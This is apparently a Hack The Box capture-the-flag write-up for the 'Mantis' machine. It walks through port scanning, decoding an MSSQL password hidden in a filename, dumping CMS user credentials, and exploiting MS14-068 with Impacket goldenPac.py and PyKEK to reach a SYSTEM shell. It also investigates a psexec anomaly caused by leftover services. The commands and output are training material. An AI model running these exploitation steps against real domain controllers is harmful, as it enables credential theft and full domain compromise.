Mantis write-up
Ανάλυση του Mantis
Enumeration
Port scanning
TCP ports
We scan the full range of TCP ports using nmap:
$ sudo nmap -T4 -A -p- 10.10.10.52
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:05:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
738/tcp filtered unknown
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1361/tcp filtered linx
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-16T19:03:50
|_Not valid after: 2047-09-16T19:03:50
|_ssl-date: 2017-09-17T08:06:17+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3734/tcp filtered synel-data
4461/tcp filtered unknown
5722/tcp open msrpc Microsoft Windows RPC
7511/tcp filtered pafec-lm
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
9484/tcp filtered unknown
9725/tcp filtered unknown
11126/tcp filtered unknown
11628/tcp filtered unknown
13100/tcp filtered unknown
13703/tcp filtered unknown
19797/tcp filtered unknown
29664/tcp filtered unknown
34288/tcp filtered unknown
35536/tcp filtered unknown
37108/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49289/tcp filtered unknown
50010/tcp open msrpc Microsoft Windows RPC
50017/tcp open msrpc Microsoft Windows RPC
50255/tcp open unknown
53029/tcp filtered unknown
55718/tcp filtered unknown
56870/tcp filtered unknown
57167/tcp filtered unknown
No exact OS matches for host
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2017-09-17T04:06:21-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
UDP ports
We scan only the 1000 most common UDP ports using nmap (because UDP scanning is too slow):
$ sudo nmap -T4 -sU -A --top-ports=1000 10.10.10.52
PORT STATE SERVICE VERSION
9/udp open|filtered discard
53/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/udp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:47:35Z)
123/udp open ntp NTP v3
| ntp-info:
|_
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open lhwclock --systohcdap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
17146/udp open|filtered unknown
20359/udp open|filtered unknown
20742/udp open|filtered unknown
32771/udp open|filtered sometimes-rpc6
49198/udp open|filtered unknown
52144/udp open domain Zoom X5 ADSL modem DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52225/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52503/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53006/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53037/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53571/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53589/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53838/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54094/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54114/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54281/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54321/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
Too many fingerprints match this host to give specific OS details
Service Info: Host: MANTIS; OS: Windows; Device: broadband router; CPE: cpe:/o:microsoft:windows_server, cpe:/o:microsoft:windows, cpe:/h:zoom:x5
Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s
Brute forcing directories and files
Port 1337
$ dirsearch -u http://10.10.10.52:1337 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp
Extensions: asp | Threads: 10 | Wordlist size: 220521
Target: http://10.10.10.52:1337
[09:17:59] Starting:
[09:18:00] 200 - 689B - /
[09:30:17] 500 - 3KB - /orchard
[10:06:05] 301 - 160B - /secure_notes -> http://10.10.10.52:1337/secure_notes/
Port 8080
$ dirsearch -u http://10.10.10.52:8080 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp
Target: http://10.10.10.52:8080
[10:14:28] Starting:
[10:14:50] 200 - 6KB - /
[10:15:13] 200 - 3KB - /archive
[10:16:15] 200 - 3KB - /blogs
[10:17:07] 302 - 163B - /admin -> /Users/Account/AccessDenied?ReturnUrl=%2Fadmin
[10:21:05] 200 - 2KB - /tags
[10:27:23] 200 - 3KB - /Archive
[10:32:18] 200 - 3KB - /pollArchive
[10:40:06] 200 - 3KB - /Blogs
[10:45:24] 200 - 3KB - /newsarchive
[10:54:36] 200 - 3KB - /news_archive
[11:18:17] 302 - 163B - /Admin -> /Users/Account/AccessDenied?ReturnUrl=%2FAdmin
Let’s visit http://10.10.10.52:1337/secure_notes/
10.10.10.52 - /secure_notes/
[To Parent Directory]
9/13/2017 4:22 PM 912 dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
9/1/2017 9:13 AM 168 web.config1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.The filename dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt seems to contain some base64-encoded text. Let’s explore it:
$ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
This seems like a hex string. Let’s convert it to ASCII:
$ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
Bingo! We found an MSSQL password. Let’s test it using the username “admin”.
Exploring MSSQL databases
Using Impacket (mssqlclient.py)
mssqlclient.py -p 1433 admin:m\$\$ql_S@_P@ssW0rd\!@10.10.10.52
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> SELECT name FROM master.dbo.sysdatabases
master
tempdb
model
msdb
orcharddb
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_UserRolesPartRecord
SQL> use orcharddb
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James
J@m3s_P@ssW0rd!
Using Metasploit
$ msfconsole
msf > use auxiliary/admin/mssql/mssql_findandsampledata
msf auxiliary(mssql_findandsampledata) > set USERNAME admin
msf auxiliary(mssql_findandsampledata) > set PASSWORD m$$ql_S@_P@ssW0rd!
msf auxiliary(mssql_findandsampledata) > set SAMPLE_SIZE 10
Name Current Setting Required Description
---- --------------- -------- -----------
KEYWORDS passw|credit|card yes Keywords to search for
PASSWORD m$$ql_S@_P@ssW0rd! no The password for the specified username
RHOSTS 10.10.10.52 yes The target address range or CIDR identifier
RPORT 1433 yes The target port (TCP)
SAMPLE_SIZE 10 yes Number of rows to sample
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads
USERNAME admin no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_findandsampledata) > exploit
[*] 10.10.10.52:1433 - Attempting to connect to the SQL Server at 10.10.10.52:1433...
[*] 10.10.10.52:1433 - Successfully connected to 10.10.10.52:1433
[*] 10.10.10.52:1433 - Attempting to retrieve data ...
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, AL1337E2D6YHm0iIysVzG8LA76Oozg
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, J@m3s_P@ssW0rd!
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, NA
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, UBwWF1CQCsaGc/P7jIR/kg==
[*] 10.10.10.52:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploiting Kerberos
We have found some credentials (james:J@m3s_P@ssW0rd!) in the MSSQL orcharddb. Let’s use them to exploit Kerberos:
Using Impacket (goldenPac.py)
Add these lines to /etc/hosts:
10.10.10.52 mantis.htb.local
10.10.10.52 htb.local
Now let’s run goldenPac.py:
$ goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file hgjtJStu.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service rQic on mantis.htb.local.....
[*] Starting service rQic.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Using PyKEK i.e. Python Kerberos Exploitation Kit (ms14-068.py)
Add these lines to /etc/hosts:
10.10.10.52 mantis.htb.local
10.10.10.52 htb.local
Add this line to /etc/resolv.conf:
nameserver 10.10.10.52
Get USER_SID using rpcclient:
$ rpcclient -U james 10.10.10.52
Enter james's password: J@m3s_P@ssW0rd!
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103
Create the ticket and copy it into the proper location:
$ git clone https://github.com/bidord/pykek && cd pykek
$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:J@m3s_P@ssW0rd!
$ cp TGT_james@htb.local.ccache /tmp/krb5cc_$(echo $UID)
Connect using smbclient:
$ smbclient -k -U james \\\\mantis.htb.local\\C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> more \USERS\Administrator\DESKTOP\root.txt
209dc756ee5c09a9967540fe18d15567
A word of advice
If Kerberos does not work as expected, make sure that you have added the proper lines in /etc/hosts and /etc/resolv.conf (and -of course- check the kerberos configuration files if you use them). Notice that kinit seems to need UPPERCASE letters for the domain in order to work correctly. Compare the following different results:
$ kinit -V james@htb.local
Using default cache: /tmp/krb5cc_1000
Using principal: james@htb.local
Password for james@htb.local: J@m3s_P@ssW0rd!
kinit: KDC reply did not match expectations while getting initial credentials
$ kinit -V james@HTB.LOCAL
Using default cache: /tmp/krb5cc_1000
Using principal: james@HTB.LOCAL
Password for james@HTB.LOCAL: J@m3s_P@ssW0rd!
Authenticated to Kerberos v5
BONUS: Exploitation using left behind services
Look Mom! No need for kerberos exploit! :D
$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file VdYFkBHZ.exe
[-] Error uploading file VdYFkBHZ.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
We got some errors, but it worked! Maybe we have access to a writable share after all…
$ smbmap.py -u james -p J@m3s_P@ssW0rd\! -H mantis.htb.local
[+] Finding open SMB ports....
[+] User SMB session establishd on mantis.htb.local...
[+] IP: mantis.htb.local:445 Name: mantis.htb.local
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON READ ONLY
SYSVOL READ ONLY
No. We don’t have access to a writable share. This is very strange. How did we get nt authority\system shell? I decided to open an issue on the github: https://github.com/CoreSecurity/impacket/issues/346
It seems that psexec.py is connecting to a previous RemComSvc instance that is still running in the target system. The need for a writeable share is only for copying the RemComSvc Windows Service file. Once it is running, all communication is done through Windows Named Pipes.
I changed the password for the administrator account to make it easier to explore the issue:
C:\Windows\system32> net user Administrator P@ssw0rd
We can use Impacket (services.py) to list the services. We look for services named using four random uppercase letters. Moreover, their executable file should be named using eight random mixed case letters and its path should be inside C:\Windows\ :
services.py htb.local/administrator:P@ssw0rd@mantis.htb.local list
...
IHXM - IHXM - RUNNING
...
TZZW - TZZW - RUNNING
...
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Querying service config for IHXM
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 2 - AUTO START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : C:\Windows\dZEyLGVN.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IHXM
DEPENDENCIES : /
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Querying service config for TZZW
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 2 - AUTO START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : C:\Windows\EfuIvklz.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TZZW
DEPENDENCIES : /
SERVICE_START_NAME: LocalSystem
Now, let’s try to stop those two services and check if psexec still works as before:
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Stopping service IHXM
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Stopping service TZZW
$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file ysSjUyKc.exe
[-] Error uploading file ysSjUyKc.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
Yup, it doesn’t work anymore. This confirms that those two services were responsible for the previous behaviour. But how those services were installed on the box in the first place? I don’t know. Probably, during the testing phase, some pentester tried to use psexec.py. If -for any reason- the cleaning up phase of the tool failed, it left behind those services.